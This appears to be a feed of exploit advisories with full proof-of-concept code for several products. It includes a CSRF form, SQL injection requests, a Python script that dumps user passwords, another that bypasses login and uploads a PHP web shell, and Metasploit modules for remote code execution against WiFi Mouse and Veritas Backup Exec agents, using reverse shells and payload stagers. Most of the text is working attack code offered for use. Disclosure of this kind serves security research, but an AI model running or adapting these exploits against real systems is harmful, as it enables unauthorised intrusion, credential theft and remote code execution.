Online Birth Certificate Management System version 1.0 suffers from an insecure direct object reference vulnerability.

    # Exploit Title: Online Birth Certificate Management System - Insecure Direct Object Reference (IDOR)# Google Dork: N/A# Date: 2022-9-27# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :1) Log in to the application after register new userUsername: testPassword: 123452) Navigate to Birth Reg Form and Click on Manage Details and click any Birth number.3)In /OBCMS/user/view-application-detail.php?viewid=1, modify the id Parameter to View birthreg details,First Name, Phone number, and other data

Online Birth Certificate Management System 1.0 Insecure Direct Object Reference

Online Birth Certificate Management System version 1.0 suffers from a cross site request forgery vulnerability.

    # Exploit Title: Online Birth Certificate Management System - Cross Site Request Forgery (CSRF)# Google Dork: N/A# Date: 2022-9-27# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0# no token in update profile admin<html>    <head>        <title> CSRF update Profile </title>    </head>    <body>        <form action="http://localhost/OBCMS/admin/profile.php" method="post" enctype="multipart/form-data">            <input type="hidden" name="adminname" value="csrf111">            <input type="hidden" name="username" value="csrf">            <input type="hidden" name="email" value="csrf">            <input type="hidden" name="mobilenumber" value="0">            <button class="btn btn-sm btn-primary login-submit-cs" type="submit" name="submit">Save Change</button>        </form>    </body></html>

Online Birth Certificate Management System 1.0 Cross Site Request Forgery

Food Ordering Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Food Ordering Management System - SQL Injection# Google Dork: N/A# Date: 2022-9-27# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/foms.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0#/usr/bin/python3 import requests import osimport sysimport timeimport randomfrom bs4 import BeautifulSoup# clean screenos.system("cls")os.system("clear")logo = '''###################################################################                                                                #  #           SQL injection (Food Ordering Management System)      ##                                                                ###################################################################'''print(logo)url = str(input("Enter website url =>  "))username = str(input("Enter Username => : "))name = ("test123456")password = ("test123456")phone = ("4511233199")number = ("1234567891000000")cvv = ("444")req = requests.Session()regsiter_page = (url+"/foms/routers/register-router.php")regsiter = {'username':username,'name':name,'password':password,'phone':phone,'number':number,'cvv':cvv}req_regsiter = req.post(regsiter_page,data=regsiter)print("[+] Regsiter Successfully")login = {'username':username,'password':password}login_page = (url+"/foms/routers/router.php")req_login = req.post(login_page,data=login)print("[+] Login Successfully")sql = req.get(url+"/foms/tickets.php?status=Open' union select 1,2,username,4,password,6,7,8 from users-- -")text = sql.textsoup = BeautifulSoup(text,"html.parser")print("[+] SQL Injction Get Users and Password from table Users")for link in soup.findAll(True, {'class':['task-cat light-blue', 'collections-title']}):    time.sleep(0.2)    print(link.get)

Food Ordering Management System 1.0 SQL Injection

Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/update_expense_category.php.

Permalink

Cannot retrieve contributors at this time

**Online Tours & Travels management system v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Wybsignal

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /tour/admin/update\_expense\_category.php

Vulnerability location: /tour/admin/update\_expense\_category.php?id=, id

dbname = tour1

\[+\] Payload: /tour/admin/update\_expense\_category.php?id=1%27%20union%20select%201,database(),3--+ // Leak place ---> id

GET /tour/admin/update\_expense\_category.php?id\=1%27%20union%20select%201,database(),3\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close

CVE-2022-40099: Bug_report/SQLi-3.md at main · WYB-signal/Bug_report

Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/update_expense.php.

**Online Tours & Travels management system v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Wybsignal

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /tour/admin/update\_expense.php

Vulnerability location: /tour/admin/update\_expense.php?id=, id

dbname = tour1

\[+\] Payload: /tour/admin/update\_expense.php?id=1%27%20union%20select%201,database(),3,4,5--+ // Leak place ---> id

GET /tour/admin/update\_expense.php?id\=1%27%20union%20select%201,database(),3,4,5\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close

CVE-2022-40098: Bug_report/SQLi-2.md at main · WYB-signal/Bug_report

Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/update_currency.php.

Permalink

**Online Tours & Travels management system v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Wybsignal

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /tour/admin/update\_currency.php

Vulnerability location: /tour/admin/update\_currency.php?id=, id

dbname = tour1

\[+\] Payload: /tour/admin/update\_currency.php?id=-1%27%20union%20select%201,database(),3--+ // Leak place ---> id

GET /tour/admin/update\_currency.php?id\=\-1%27%20union%20select%201,database(),3\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close

CVE-2022-40097: Bug_report/SQLi-1.md at main · WYB-signal/Bug_report

The WiFi Mouse (Mouse Server) from Necta LLC contains an authentication bypass as the authentication is completely implemented entirely on the client side. By utilizing this vulnerability, is possible to open a program on the server (cmd.exe in our case) and type commands that will be executed as the user running WiFi Mouse (Mouse Server), resulting in remote code execution. Tested against versions 1.8.3.4 (current as of module writing) and 1.8.2.3.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  include Exploit::Remote::Tcp  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Wifi Mouse RCE',        'Description' => %q{          The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the          authentication is completely implemented entirely on the client side. By utilizing          this vulnerability, is possible to open a program on the server          (cmd.exe in our case) and type commands that will be executed as the user running          WiFi Mouse (Mouse Server), resulting in remote code execution.          Tested against versions 1.8.3.4 (current as of module writing) and          1.8.2.3.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'REDHATAUGUST', # edb          'H4RK3NZ0' # edb, original discovery        ],        'References' => [          [ 'EDB', '50972' ],          [ 'EDB', '49601' ],          [ 'CVE', '2022-3218' ],          [ 'URL', 'http://wifimouse.necta.us/' ],          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/wifi%20mouse/wifi-mouse-server-rce.py' ]        ],        'Arch' => [ ARCH_X64, ARCH_X86 ],        'Platform' => 'win',        'Targets' => [          [            'stager',            {              'CmdStagerFlavor' => ['psh_invokewebrequest', 'certutil']            }          ],        ],        'Payload' => {          'BadChars' => "\x0a\x00"        },        'DefaultOptions' => {          # since this may get typed out ON SCREEN we want as small a payload as possible          'PAYLOAD' => 'windows/shell/reverse_tcp'        },        'DisclosureDate' => '2021-02-25',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [CRASH_SERVICE_DOWN],          'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # typing on screen        }      )    )    register_options(      [        OptPort.new('RPORT', [true, 'Port WiFi Mouse Mouse Server runs on', 1978]),        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),        OptInt.new('LINEMAX', [true, 'Maximum length of lines to send for stager method.  Smaller for more unstable connections.', 1_020]),      ]    )  end  def send_return    sock.put('key  3RTN') # what the mobile app sends  end  def send_command(command)    sock.put("utf8 #{command}\x0A")    sleep(datastore['SLEEP'])    send_return  end  def open_file(file)    file = "/#{file}".gsub('\\', '/').gsub(':', '')    sock.put("openfile #{file}\x0A")  end  def exploit    connect    print_status('Opening command prompt')    open_file('C:\\Windows\\System32\\cmd.exe')    sleep(datastore['SLEEP']) # give time for it to open    print_status('Typing out payload')    execute_cmdstager({ linemax: datastore['LINEMAX'], delay: datastore['SLEEP'] })    handler  end  def execute_command(cmd, _opts = {})    send_command(cmd)  endend

WiFi Mouse 1.8.3.4 Remote Code Execution

Veritas Backup Exec Agent supports multiple authentication schemes and SHA authentication is one of them. This authentication scheme is no longer used within Backup Exec versions, but had not yet been disabled. An attacker could remotely exploit the SHA authentication scheme to gain unauthorized access to the BE Agent and execute an arbitrary OS command on the host with NT AUTHORITY\SYSTEM or root privileges depending on the platform. The vulnerability presents in 16.x, 20.x and 21.x versions of Backup Exec up to 21.2 (or up to and including Backup Exec Remote Agent revision 9.3).

    # frozen_string_literal: true### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::Tcp  include Msf::Exploit::Remote::NDMPSocket  include Msf::Exploit::CmdStager  include Msf::Exploit::EXE  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Veritas Backup Exec Agent Remote Code Execution',        'Description' => %q{          Veritas Backup Exec Agent supports multiple authentication schemes and SHA authentication is one of them.          This authentication scheme is no longer used within Backup Exec versions, but hadn’t yet been disabled.          An attacker could remotely exploit the SHA authentication scheme to gain unauthorized access to          the BE Agent and execute an arbitrary OS command on the host with NT AUTHORITY\SYSTEM or root privileges          depending on the platform.          The vulnerability presents in 16.x, 20.x and 21.x versions of Backup Exec up to 21.2 (or up to and          including Backup Exec Remote Agent revision 9.3)        },        'License' => MSF_LICENSE,        'Author' => ['Alexander Korotin <0xc0rs[at]gmail.com>'],        'References' => [          ['CVE', '2021-27876'],          ['CVE', '2021-27877'],          ['CVE', '2021-27878'],          ['URL', 'https://www.veritas.com/content/support/en_US/security/VTS21-001']        ],        'Platform' => %w[win linux],        'Targets' => [          [            'Windows',            {              'Platform' => 'win',              'Arch' => [ARCH_X86, ARCH_X64],              'CmdStagerFlavor' => %w[certutil vbs psh_invokewebrequest debug_write debug_asm]            }          ],          [            'Linux',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'CmdStagerFlavor' => %w[bourne wget curl echo]            }          ]        ],        'DefaultOptions' => {          'RPORT' => 10_000        },        'Privileged' => true,        'DisclosureDate' => '2021-03-01',        'DefaultTarget' => 0,        'Notes' => {          'Reliability' => [UNRELIABLE_SESSION],          'Stability' => [CRASH_SAFE],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options([      OptString.new('SHELL', [true, 'The shell for executing OS command', '/bin/bash'],                    conditions: ['TARGET', '==', 'Linux'])    ])    deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')  end  def execute_command(cmd, opts = {})    case target.opts['Platform']    when 'win'      wrap_cmd = "C:\\Windows\\System32\\cmd.exe /c \"#{cmd}\""    when 'linux'      wrap_cmd = "#{datastore['SHELL']} -c \"#{cmd}\""    end    ndmp_sock = opts[:ndmp_sock]    ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_EXECUTE_COMMAND,        NdmpExecuteCommandReq.new({ cmd: wrap_cmd, unknown: 0 }).to_xdr      )    )  end  def exploit    print_status('Exploiting ...')    ndmp_status, ndmp_sock, msg_fail_reason = ndmp_connect    fail_with(Msf::Module::Failure::NotFound, "Can not connect to BE Agent service. #{msg_fail_reason}") unless ndmp_status    ndmp_status, msg_fail_reason = tls_enabling(ndmp_sock)    fail_with(Msf::Module::Failure::UnexpectedReply, "Can not establish TLS connection. #{msg_fail_reason}") unless ndmp_status    ndmp_status, msg_fail_reason = sha_authentication(ndmp_sock)    fail_with(Msf::Module::Failure::NotVulnerable, "Can not authenticate with SHA. #{msg_fail_reason}") unless ndmp_status    if target.opts['Platform'] == 'win'      filename = "#{rand_text_alpha(8)}.exe"      ndmp_status, msg_fail_reason = win_write_upload(ndmp_sock, filename)      if ndmp_status        ndmp_status, msg_fail_reason = exec_win_command(ndmp_sock, filename)        fail_with(Msf::Module::Failure::PayloadFailed, "Can not execute payload. #{msg_fail_reason}") unless ndmp_status      else        print_status('Can not upload payload with NDMP_FILE_WRITE packet. Trying to upload with CmdStager')        execute_cmdstager({ ndmp_sock: ndmp_sock, linemax: 512 })      end    else      print_status('Uploading payload with CmdStager')      execute_cmdstager({ ndmp_sock: ndmp_sock, linemax: 512 })    end  end  def check    print_status('Checking vulnerability')    ndmp_status, ndmp_sock, msg_fail_reason = ndmp_connect    return Exploit::CheckCode::Unknown("Can not connect to BE Agent service. #{msg_fail_reason}") unless ndmp_status    print_status('Getting supported authentication types')    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(NDMP::Message::CONFIG_GET_SERVER_INFO)    )    ndmp_payload = NdmpConfigGetServerInfoRes.from_xdr(ndmp_msg.body)    print_status("Supported authentication by BE agent: #{ndmp_payload.auth_types.map do |k, _|                                                          "#{AUTH_TYPES[k]} (#{k})"                                                        end.join(', ')}")    print_status("BE agent revision: #{ndmp_payload.revision}")    if ndmp_payload.auth_types.include?(5)      Exploit::CheckCode::Appears('SHA authentication is enabled')    else      Exploit::CheckCode::Safe('SHA authentication is disabled')    end  end  def ndmp_connect    print_status('Connecting to BE Agent service')    ndmp_msg = nil    begin      ndmp_sock = NDMP::Socket.new(connect)    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout,           Rex::ConnectionRefused => e      return [false, nil, e.to_s]    end    begin      Timeout.timeout(datastore['ConnectTimeout']) do        ndmp_msg = ndmp_sock.read_ndmp_msg(NDMP::Message::NOTIFY_CONNECTED)      end    rescue Timeout::Error      return [false, nil, 'No NDMP_NOTIFY_CONNECTED (0x502) packet from BE Agent service']    else      ndmp_payload = NdmpNotifyConnectedRes.from_xdr(ndmp_msg.body)    end    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP::Message::CONNECT_OPEN,        NdmpConnectOpenReq.new({ version: ndmp_payload.version }).to_xdr      )    )    ndmp_payload = NdmpConnectOpenRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, ndmp_sock, "Error code of NDMP_CONNECT_OPEN (0x900) packet: #{ndmp_payload.err_code}"]    end    [true, ndmp_sock, nil]  end  def tls_enabling(ndmp_sock)    print_status('Enabling TLS for NDMP connection')    ndmp_tls_certs = NdmpTlsCerts.new('VeritasBE', datastore['RHOSTS'].to_s)    ndmp_tls_certs.forge_ca    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_SSL_HANDSHAKE,        NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_REQ])).to_xdr      )    )    ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of SSL_HANDSHAKE_CSR_REQ (2) packet: #{ndmp_payload.err_code}"]    end    ndmp_tls_certs.sign_agent_csr(ndmp_payload.data)    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_SSL_HANDSHAKE,        NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_SIGNED])).to_xdr      )    )    ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of SSL_HANDSHAKE_CSR_SIGNED (3) packet: #{ndmp_payload.err_code}"]    end    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_SSL_HANDSHAKE,        NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CONNECT])).to_xdr      )    )    ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of SSL_HANDSHAKE_CONNECT (4) packet: #{ndmp_payload.err_code}"]    end    ssl_context = OpenSSL::SSL::SSLContext.new    ssl_context.add_certificate(ndmp_tls_certs.ca_cert, ndmp_tls_certs.ca_key)    ndmp_sock.wrap_with_ssl(ssl_context)    [true, nil]  end  def sha_authentication(ndmp_sock)    print_status('Passing SHA authentication')    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_CONFIG_GET_AUTH_ATTR,        NdmpConfigGetAuthAttrReq.new({ auth_type: 5 }).to_xdr      )    )    ndmp_payload = NdmpConfigGetAuthAttrRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of NDMP_CONFIG_GET_AUTH_ATTR (0x103) packet: #{ndmp_payload.err_code}"]    end    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP::Message::CONNECT_CLIENT_AUTH,        NdmpConnectClientAuthReq.new(          {            auth_type: 5,            username: 'Administrator', # Doesn't metter            hash: Digest::SHA256.digest("\x00" * 64 + ndmp_payload.challenge)          }        ).to_xdr      )    )    ndmp_payload = NdmpConnectClientAuthRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of NDMP_CONECT_CLIENT_AUTH (0x901) packet: #{ndmp_payload.err_code}"]    end    [true, nil]  end  def win_write_upload(ndmp_sock, filename)    print_status('Uploading payload with NDMP_FILE_WRITE packet')    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_FILE_OPEN_EXT,        NdmpFileOpenExtReq.new(          {            filename: filename,            dir: '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\Temp',            mode: 4          }        ).to_xdr      )    )    ndmp_payload = NdmpFileOpenExtRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of NDMP_FILE_OPEN_EXT (0xf308) packet: #{ndmp_payload.err_code}"]    end    hnd = ndmp_payload.handler    exe = generate_payload_exe    offset = 0    block_size = 2048    while offset < exe.length      ndmp_msg = ndmp_sock.do_request_response(        NDMP::Message.new_request(          NDMP_FILE_WRITE,          NdmpFileWriteReq.new({ handler: hnd, len: block_size, data: exe[offset, block_size] }).to_xdr        )      )      ndmp_payload = NdmpFileWriteRes.from_xdr(ndmp_msg.body)      unless ndmp_payload.err_code.zero?        return [false, "Error code of NDMP_FILE_WRITE (0xF309) packet: #{ndmp_payload.err_code}"]      end      offset += block_size    end    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_FILE_CLOSE,        NdmpFileCloseReq.new({ handler: hnd }).to_xdr      )    )    ndmp_payload = NdmpFileCloseRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of NDMP_FILE_CLOSE (0xF306) packet: #{ndmp_payload.err_code}"]    end    [true, nil]  end  def exec_win_command(ndmp_sock, filename)    cmd = "C:\\Windows\\System32\\cmd.exe /c \"C:\\Windows\\Temp\\#{filename}\""    ndmp_msg = ndmp_sock.do_request_response(      NDMP::Message.new_request(        NDMP_EXECUTE_COMMAND,        NdmpExecuteCommandReq.new({ cmd: cmd, unknown: 0 }).to_xdr      )    )    ndmp_payload = NdmpExecuteCommandRes.from_xdr(ndmp_msg.body)    unless ndmp_payload.err_code.zero?      return [false, "Error code of NDMP_EXECUTE_COMMAND (0xF30F) packet: #{ndmp_payload.err_code}"]    end    [true, nil]  end  # Class to create CA and client certificates  class NdmpTlsCerts    def initialize(hostname, ip)      @hostname = hostname      @ip = ip      @ca_key = nil      @ca_cert = nil      @be_agent_cert = nil    end    SSL_HANDSHAKE_TYPES = {      SSL_HANDSHAKE_TEST_CERT: 1,      SSL_HANDSHAKE_CSR_REQ: 2,      SSL_HANDSHAKE_CSR_SIGNED: 3,      SSL_HANDSHAKE_CONNECT: 4    }.freeze    attr_reader :ca_cert, :ca_key    def forge_ca      @ca_key = OpenSSL::PKey::RSA.new(2048)      @ca_cert = OpenSSL::X509::Certificate.new      @ca_cert.version = 2      @ca_cert.serial = rand(2**32..2**64 - 1)      @ca_cert.subject = @ca_cert.issuer = OpenSSL::X509::Name.parse("/CN=#{@hostname}")      extn_factory = OpenSSL::X509::ExtensionFactory.new(@ca_cert, @ca_cert)      @ca_cert.extensions = [        extn_factory.create_extension('subjectKeyIdentifier', 'hash'),        extn_factory.create_extension('basicConstraints', 'CA:TRUE'),        extn_factory.create_extension('keyUsage', 'keyCertSign, cRLSign')      ]      @ca_cert.add_extension(extn_factory.create_extension('authorityKeyIdentifier', 'keyid:always'))      @ca_cert.public_key = @ca_key.public_key      @ca_cert.not_before = Time.now - 7 * 60 * 60 * 24      @ca_cert.not_after = Time.now + 14 * 24 * 60 * 60      @ca_cert.sign(@ca_key, OpenSSL::Digest.new('SHA256'))    end    def sign_agent_csr(csr)      o_csr = OpenSSL::X509::Request.new(csr)      @be_agent_cert = OpenSSL::X509::Certificate.new      @be_agent_cert.version = 2      @be_agent_cert.serial = rand(2**32..2**64 - 1)      @be_agent_cert.not_before = Time.now - 7 * 60 * 60 * 24      @be_agent_cert.not_after = Time.now + 14 * 24 * 60 * 60      @be_agent_cert.issuer = @ca_cert.subject      @be_agent_cert.subject = o_csr.subject      @be_agent_cert.public_key = o_csr.public_key      @be_agent_cert.sign(@ca_key, OpenSSL::Digest.new('SHA256'))    end    def default_sslpacket_content(ssl_packet_type)      if ssl_packet_type == SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_SIGNED]        ca_cert = @ca_cert.to_s        agent_cert = @be_agent_cert.to_s      else        ca_cert = ''        agent_cert = ''      end      {        ssl_packet_type: ssl_packet_type,        hostname: @hostname,        nb_hostname: @hostname.upcase,        ip_addr: @ip,        cert_id1: get_cert_id(@ca_cert),        cert_id2: get_cert_id(@ca_cert),        unknown1: 0,        unknown2: 0,        ca_cert_len: ca_cert.length,        ca_cert: ca_cert,        agent_cert_len: agent_cert.length,        agent_cert: agent_cert      }    end    def get_cert_id(cert)      Digest::SHA1.digest(cert.issuer.to_s + cert.serial.to_s(2))[0...4].unpack1('L<')    end  end  NDMP_CONFIG_GET_AUTH_ATTR = 0x103  NDMP_SSL_HANDSHAKE = 0xf383  NDMP_EXECUTE_COMMAND = 0xf30f  NDMP_FILE_OPEN_EXT = 0xf308  NDMP_FILE_WRITE = 0xF309  NDMP_FILE_CLOSE = 0xF306  AUTH_TYPES = {    1 => 'Text',    2 => 'MD5',    3 => 'BEWS',    4 => 'SSPI',    5 => 'SHA',    190 => 'BEWS2' # 0xBE  }.freeze  # Responce packets  class NdmpNotifyConnectedRes < XDR::Struct    attribute :connected, XDR::Int    attribute :version, XDR::Int    attribute :reason, XDR::Int  end  class NdmpConnectOpenRes < XDR::Struct    attribute :err_code, XDR::Int  end  class NdmpConfigGetServerInfoRes < XDR::Struct    attribute :err_code, XDR::Int    attribute :vendor_name, XDR::String[]    attribute :product_name, XDR::String[]    attribute :revision, XDR::String[]    attribute :auth_types, XDR::VarArray[XDR::Int]  end  class NdmpConfigGetHostInfoRes < XDR::Struct    attribute :err_code, XDR::Int    attribute :hostname, XDR::String[]    attribute :os, XDR::String[]    attribute :os_info, XDR::String[]    attribute :ip, XDR::String[]  end  class NdmpSslHandshakeRes < XDR::Struct    attribute :data_len, XDR::Int    attribute :data, XDR::String[]    attribute :err_code, XDR::Int    attribute :unknown4, XDR::String[]  end  class NdmpConfigGetAuthAttrRes < XDR::Struct    attribute :err_code, XDR::Int    attribute :auth_type, XDR::Int    attribute :challenge, XDR::Opaque[64]  end  class NdmpConnectClientAuthRes < XDR::Struct    attribute :err_code, XDR::Int  end  class NdmpExecuteCommandRes < XDR::Struct    attribute :err_code, XDR::Int  end  class NdmpFileOpenExtRes < XDR::Struct    attribute :err_code, XDR::Int    attribute :handler, XDR::Int  end  class NdmpFileWriteRes < XDR::Struct    attribute :err_code, XDR::Int    attribute :recv_len, XDR::Int    attribute :unknown, XDR::Int  end  class NdmpFileCloseRes < XDR::Struct    attribute :err_code, XDR::Int  end  # Request packets  class NdmpConnectOpenReq < XDR::Struct    attribute :version, XDR::Int  end  class NdmpSslHandshakeReq < XDR::Struct    attribute :ssl_packet_type, XDR::Int    attribute :nb_hostname, XDR::String[]    attribute :hostname, XDR::String[]    attribute :ip_addr, XDR::String[]    attribute :cert_id1, XDR::Int    attribute :cert_id2, XDR::Int    attribute :unknown1, XDR::Int    attribute :unknown2, XDR::Int    attribute :ca_cert_len, XDR::Int    attribute :ca_cert, XDR::String[]    attribute :agent_cert_len, XDR::Int    attribute :agent_cert, XDR::String[]  end  class NdmpConfigGetAuthAttrReq < XDR::Struct    attribute :auth_type, XDR::Int  end  class NdmpConnectClientAuthReq < XDR::Struct    attribute :auth_type, XDR::Int    attribute :username, XDR::String[]    attribute :hash, XDR::Opaque[32]  end  class NdmpExecuteCommandReq < XDR::Struct    attribute :cmd, XDR::String[]    attribute :unknown, XDR::Int  end  class NdmpFileOpenExtReq < XDR::Struct    attribute :filename, XDR::String[]    attribute :dir, XDR::String[]    attribute :mode, XDR::Int  end  class NdmpFileWriteReq < XDR::Struct    attribute :handler, XDR::Int    attribute :len, XDR::Int    attribute :data, XDR::String[]  end  class NdmpFileCloseReq < XDR::Struct    attribute :handler, XDR::Int  endend

Veritas Backup Exec Agent Remote Code Execution

Online Diagnostic Lab Management System version 1.0 remote exploit that bypasses login with SQL injection and then uploads a shell.

    # Exploit Title: Online Diagnostic Lab Management System - Remote Code Execution (RCE) (Unauthenticated)# Google Dork: N/A# Date: 2022-9-23# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0# Authentication Required: bypass login with sql injection #/usr/bin/python3 import requests import osimport sysimport timeimport random# clean screenos.system("cls")os.system("clear")logo = '''###################################################################                                                                #  #    Exploit Script ( Online Diagnostic Lab Management System )  ##                                                                ###################################################################'''print(logo)url = str(input("Enter website url : "))username = ("' OR 1=1-- -")password = ("test")req = requests.Session()target = url+"/diagnostic/login.php"data = {'username':username,'password':password}website = req.post(target,data=data)files = open("rev.php","w")payload = "<?php system($_GET['cmd']);?>"files.write(payload)files.close()hash = random.getrandbits(128)name_file = str(hash)+".php"if "Login Successfully" in website.text:        print("[+] Login Successfully")    website_1 = url+"/diagnostic/php_action/createOrder.php"    upload_file = {         "orderDate": (None,""),        "clientName": (None,""),        "clientContact" : (None,""),        "productName[]" : (None,""),        "rateValue[]" : (None,""),        "quantity[]" : (None,""),        "totalValue[]" : (None,""),        "subTotalValue" : (None,""),        "totalAmountValue" : (None,""),        "discount" : (None,""),        "grandTotalValue" : (None,""),        "gstn" : (None,""),        "vatValue" : (None,""),        "paid" : (None,""),        "dueValue" : (None,""),        "paymentType" : (None,""),        "paymentStatus" : (None,""),        "paymentPlace" : (None,""),        "productImage" : (name_file,open("rev.php","rb"))        }     up = req.post(website_1,files=upload_file)    print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)    print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")else:     print("[-] Check username or password")

Online Diagnostic Lab Management System 1.0 SQL Injection / Shell Upload

Backdoor.Win32.Bingle.b malware suffers from a hardcoded credential vulnerability.

